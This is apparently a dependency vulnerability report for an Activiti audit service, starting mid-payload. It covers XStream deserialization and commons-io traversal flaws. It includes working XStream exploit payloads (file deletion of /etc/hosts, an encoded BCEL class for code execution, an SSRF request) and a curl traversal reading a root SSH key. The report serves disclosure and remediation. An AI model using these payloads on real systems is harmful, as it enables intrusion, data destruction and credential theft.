<isReadOnly>false</isReadOnly>
</buf>
<position>0</position>
<matcher>
<parentPattern>
<pattern>\p{javaWhitespace}+</pattern>
<flags>0</flags>
</parentPattern>
<from>0</from>
<to>0</to>
<lookbehindTo>0</lookbehindTo>
<text class='java.nio.HeapCharBuffer' reference='../../buf'/>
<acceptMode>0</acceptMode>
<first>-1</first>
<last>0</last>
<oldLast>-1</oldLast>
<lastAppendPosition>0</lastAppendPosition>
<locals/>
<hitEnd>false</hitEnd>
<requireEnd>false</requireEnd>
<transparentBounds>true</transparentBounds>
<anchoringBounds>false</anchoringBounds>
</matcher>
<delimPattern>
<pattern>(x+)*y</pattern>
<flags>0</flags>
</delimPattern>
<hasNextPosition>0</hasNextPosition>
<source class='java.io.StringReader'>
<lock class='java.io.StringReader' reference='..'/>
<str>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</str>
<length>32</length>
<next>0</next>
<mark>0</mark>
</source>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
<packet>
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
<dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>
<part>
<dataHead>
<tail/>
<head>
<data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>
<len>3</len>
<data>AQID</data>
</data>
</head>
</dataHead>
<contentTransferEncoding>base64</contentTransferEncoding>
<msg>
<it class='java.util.ArrayList$Itr'>
<cursor>0</cursor>
<lastRet>1</lastRet>
<expectedModCount>4</expectedModCount>
<outer-class>
<com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
<com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
<com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
<com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
</outer-class>
</it>
<in class='java.io.FileInputStream'>
<fd/>
<channel class='sun.nio.ch.FileChannelImpl'>
<closeLock/>
<open>true</open>
<threads>
<used>-1</used>
</threads>
<parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>
<sockClient>
<fileName>/etc/hosts</fileName>
<unlinkFile>true</unlinkFile>
</sockClient>
<connectionSync/>
</parent>
</channel>
<closeLock/>
</in>
</msg>
</part>
</dataSource>
</message>
<satellites/>
<invocationProperties/>
</packet>
</indexMap>
</comparator>
</default>
<int>3</int>
<string>javax.xml.ws.binding.attachments.inbound</string>
<string>javax.xml.ws.binding.attachments.inbound</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
<names class='java.util.AbstractList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>0</expectedModCount>
<outer-class class='java.util.Arrays$ArrayList'>
<a class='string-array'>
<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A</string>
</a>
</outer-class>
</names>
<processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
<parent class='sun.misc.Launcher$ExtClassLoader'>
</parent>
<package2certs class='hashtable'/>
<classes defined-in='java.lang.ClassLoader'/>
<defaultDomain>
<classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
<principals/>
<hasAllPerm>false</hasAllPerm>
<staticPermissions>false</staticPermissions>
<key>
<outer-class reference='../..'/>
</key>
</defaultDomain>
<packages/>
<nativeLibraries/>
<assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
<defaultAssertionStatus>false</defaultAssertionStatus>
<classes/>
<ignored__packages>
<string>java.</string>
<string>javax.</string>
<string>sun.</string>
</ignored__packages>
<repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
<__path>
<paths/>
<class__path>.</class__path>
</__path>
<__loadedClasses/>
</repository>
<deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
</processorCL>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
<packet>
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
<dataSource class='javax.activation.URLDataSource'>
<url>http://localhost:8080/internal/:</url>
</dataSource>
</message>
</packet>
</indexMap>
</comparator>
</default>
<int>3</int>
<string>javax.xml.ws.binding.attachments.inbound</string>
<string>javax.xml.ws.binding.attachments.inbound</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: commons-io:commons-io
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final › commons-io:commons-io@2.6
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final › commons-io:commons-io@2.6
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › commons-io:commons-io@2.6Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
commons-io:commons-io is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.
Affected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like //../foo or \\..\foo, which may allow access to files in the parent directory.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
